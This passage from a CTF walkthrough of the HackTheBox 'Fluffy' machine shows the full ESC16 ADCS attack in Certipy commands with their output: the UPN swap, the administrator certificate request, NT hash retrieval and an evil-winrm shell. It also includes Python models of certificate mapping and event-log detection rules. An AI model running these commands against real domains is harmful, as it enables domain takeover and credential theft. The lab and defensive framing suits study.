    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
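To make the mapping logic concrete, here is an added example (not from the page, Certipy or Microsoft) that models, in simplified form, how the KDC decides which account a client certificate belongs to, and runs the three steps of the attack against a constructed directory. Assumptions, stated in the code: the KDC matches an explicit userPrincipalName before the implicit sam@realm form, the SID extension is checked against the mapped account when present, and in Full Enforcement a certificate without it is refused; the realm-qualified UPN administrator@fluffy.htb is used instead of the bare value the write-up sets, and the SIDs are made up.

```python
"""Added example: a simplified model of the KDC's certificate-to-account
mapping (KB5014754 strong/weak mapping), enough to show why ESC16 plus a UPN
rewrite works and why the UPN must be restored before the certificate is
used. Assumed rules: explicit UPN matched before implicit sam@realm; SID
extension, when present, must agree with the matched account; in Full
Enforcement a certificate without it is refused. Names/SIDs are constructed."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

SID_EXT_OID = "1.3.6.1.4.1.311.25.2"   # szOID_NTDS_CA_SECURITY_EXT


@dataclass
class Account:
    sam: str
    sid: str
    upn: Optional[str] = None          # explicit userPrincipalName, if any


@dataclass
class Cert:
    san_upn: str
    extensions: Dict[str, str] = field(default_factory=dict)


@dataclass
class CA:
    name: str
    disabled_extensions: Set[str] = field(default_factory=set)

    def issue(self, enrollee: Account, realm: str) -> Cert:
        """User template: the SAN UPN is taken from the enrollee's own UPN
        attribute; the SID extension is added unless it is on the CA's
        DisableExtensionList, which is exactly the ESC16 condition."""
        upn = enrollee.upn or f"{enrollee.sam}@{realm}"
        cert = Cert(san_upn=upn)
        if SID_EXT_OID not in self.disabled_extensions:
            cert.extensions[SID_EXT_OID] = enrollee.sid
        return cert


def map_certificate(cert: Cert, directory: List[Account], realm: str,
                    full_enforcement: bool = False) -> Optional[Account]:
    """Account the KDC would log the certificate on as, or None if refused."""
    sid = cert.extensions.get(SID_EXT_OID)
    if full_enforcement and sid is None:
        return None                                  # no strong mapping available
    matches = [a for a in directory if a.upn == cert.san_upn]
    if not matches:                                  # fall back to implicit UPN
        matches = [a for a in directory if a.upn is None and f"{a.sam}@{realm}" == cert.san_upn]
    if len(matches) != 1:
        return None                                  # unknown or ambiguous
    acct = matches[0]
    if sid is not None and sid != acct.sid:
        return None                                  # SID contradicts the UPN match
    return acct


def esc16_chain(ca: CA, restore_upn: bool = True,
                full_enforcement: bool = False) -> Tuple[Cert, Optional[str]]:
    """Run the three steps from the write-up against a constructed directory."""
    realm = "fluffy.htb"
    admin = Account("administrator", "S-1-5-21-1-2-3-500")
    ca_svc = Account("ca_svc", "S-1-5-21-1-2-3-1103", "ca_svc@fluffy.htb")
    directory = [admin, ca_svc]
    ca_svc.upn = f"administrator@{realm}"            # 1. rewrite our own UPN
    cert = ca.issue(ca_svc, realm)                   # 2. enrol as ca_svc
    if restore_upn:
        ca_svc.upn = "ca_svc@fluffy.htb"             # 3. put the UPN back
    mapped = map_certificate(cert, directory, realm, full_enforcement)
    return cert, (mapped.sam if mapped else None)


def scenarios() -> Dict[str, Optional[str]]:
    vulnerable = CA("fluffy-DC01-CA", {SID_EXT_OID})  # extension disabled, as certipy find reports
    hardened = CA("fluffy-DC01-CA")                    # extension re-enabled
    return {
        "esc16_upn_restored": esc16_chain(vulnerable)[1],
        "esc16_upn_left_on_ca_svc": esc16_chain(vulnerable, restore_upn=False)[1],
        "sid_extension_enabled": esc16_chain(hardened)[1],
        "esc16_but_full_enforcement": esc16_chain(vulnerable, full_enforcement=True)[1],
    }


if __name__ == "__main__":
    for name, who in scenarios().items():
        print(f"{name:28s} -> {who}")
```

The four scenarios are the whole story: with the extension disabled and the UPN restored, the certificate logs on as administrator; leave the UPN on ca_svc and it maps back to ca_svc; re-enable the extension and the embedded ca_svc SID contradicts the UPN match; move the KDC to Full Enforcement and a SID-less certificate is refused outright. Fixing ESC16 means removing the OID from the CA's DisableExtensionList and re-issuing certificates, not just tightening templates.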

[0x0539] > Exploiting ESC16: rewriting ca_svc's UPN to administrator (the update is made as ca_svc itself, which can write its own userPrincipalName here):

┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' \
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -upn 'administrator' \
-user 'ca_svc' update

Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'

[0x0539] > Confirming that the UPN now reads administrator:

┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' \
-dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -user 'ca_svc' read

Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : administrator
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-08-01T21:53:02+00:00

[0x0539] > Requesting the administrator certificate from the User template. Whatever name is typed into -username, the enrolment has to be authenticated as ca_svc (its hash, or the ticket exported above with -k), because the User template copies the enrolling account's userPrincipalName into the SAN; enrolling as anyone else yields a certificate for that other account. Certipy's output confirms the ESC16 condition on the issued certificate: "Certificate has no object SID".

┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug req -username 'administrator' -hashes ':hash' -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: None
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'ADMINISTRATOR'
[+] Trying to resolve 'DC01.fluffy.htb' at '10.129.164.91'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.164.91[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.164.91[\pipe\cert]
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

[0x0539] > Restoring the UPN before using the certificate.

[0x0539] > This detail matters: the KDC maps the certificate to an account through the UPN in its SAN, so if ca_svc still carried administrator, the lookup would land on ca_svc (or fail on the duplicate) rather than on the real Administrator. Setting ca_svc back to ca_svc@fluffy.htb leaves administrator resolving only to the Administrator account, and it also leaves the directory as we found it.

┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' -dc-ip 10.129.164.91 -ns 10.129.164.91 \
-target DC01.fluffy.htb -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'

[0x0539] > Authenticating with the administrator certificate to obtain the NT hash, then the root flag. This time certipy auth finds the identity inside the certificate itself (SAN UPN 'administrator'), unlike the pywhisker PFX earlier.

┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.164.91
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': HASH_NTLM
                                                                                                         
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# evil-winrm -i 10.129.164.91 -u 'administrator' -H 'hash'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
1337_ROOT_:|
*Evil-WinRM* PS C:\Users\Administrator\Documents> 
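From the defender's side, every step of this chain leaves a trace in the DC's Security log. The following is an added example (not from the page, not a product rule set) that runs simple detection logic over a handful of constructed events: a user adding itself to a group (4728), a user writing msDS-KeyCredentialLink on another object (5136, with auditing on the attribute), and a userPrincipalName rewritten to a privileged name followed by a certificate request from the same account (4738 then 4887) and the later revert. The events are simplified dicts whose keys stand in for the Windows event fields; the names and times are made up to mirror the write-up.

```python
"""Added example: detection logic for the ACL abuse, shadow credentials and
ESC16 UPN-swap steps, run over constructed Security-log events (simplified
dicts, not raw EVTX; field names stand for the Windows event fields)."""
from typing import Dict, List, Tuple

PRIVILEGED = {"administrator"}

# Constructed events; times are seconds for brevity.
EVENTS: List[Dict] = [
    {"id": 4728, "t": 100, "subject": "p.agila", "member": "p.agila", "group": "Service Accounts"},
    {"id": 5136, "t": 130, "subject": "p.agila", "attr": "msDS-KeyCredentialLink",
     "object": "CN=winrm service,CN=Users,DC=fluffy,DC=htb"},
    {"id": 5136, "t": 140, "subject": "p.agila", "attr": "msDS-KeyCredentialLink",
     "object": "CN=certificate authority service,CN=Users,DC=fluffy,DC=htb"},
    {"id": 4738, "t": 300, "subject": "ca_svc", "target": "ca_svc",
     "field": "UserPrincipalName", "value": "administrator"},
    {"id": 4887, "t": 320, "requester": "FLUFFY\\ca_svc", "template": "User"},
    {"id": 4738, "t": 340, "subject": "ca_svc", "target": "ca_svc",
     "field": "UserPrincipalName", "value": "ca_svc@fluffy.htb"},
    # benign noise: helpdesk fixing a UPN, with no certificate request afterwards
    {"id": 4738, "t": 900, "subject": "helpdesk", "target": "j.fleischman",
     "field": "UserPrincipalName", "value": "j.fleischman@fluffy.htb"},
]


def _short(name: str) -> str:
    """'FLUFFY\\ca_svc' -> 'ca_svc', lower-cased."""
    return name.split("\\")[-1].lower()


def detect(events: List[Dict], window: int = 600) -> List[Tuple]:
    findings: List[Tuple] = []
    for e in events:
        if e["id"] == 4728 and _short(e["subject"]) == _short(e["member"]):
            findings.append(("self-add-to-group", e["subject"], e["group"]))
        if e["id"] == 5136 and e["attr"].lower() == "msds-keycredentiallink":
            # Legitimate writes come from device registration / Windows Hello
            # enrolment by the principal itself; an interactive user writing
            # it on another object is shadow credentials. (Self-enrolment
            # suppression is left out of this simplified rule.)
            findings.append(("shadow-credentials-write", e["subject"], e["object"]))
    upn_changes = [e for e in events if e["id"] == 4738 and e["field"] == "UserPrincipalName"]
    for ch in upn_changes:
        new_name = ch["value"].split("@")[0].lower()
        if new_name == _short(ch["target"]) or new_name not in PRIVILEGED:
            continue                                     # own name or not privileged
        requests = [r for r in events if r["id"] == 4887
                    and _short(r["requester"]) == _short(ch["target"])
                    and ch["t"] <= r["t"] <= ch["t"] + window]
        if not requests:
            continue
        reverted = any(o["target"] == ch["target"] and o["t"] > ch["t"]
                       and o["value"].split("@")[0].lower() == _short(ch["target"])
                       for o in upn_changes)
        findings.append(("upn-swap-cert-request", ch["target"], ch["value"], reverted))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The UPN rule is the one worth keeping: a UPN changed to another account's name, a certificate issued to that account minutes later, and the UPN quietly changed back is the ESC16 signature and has no legitimate equivalent. The 5136 events only exist if a SACL audits writes to msDS-KeyCredentialLink on user objects, which is not the default.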

Another machine done. I hope you learned something from this one; see you in the next!
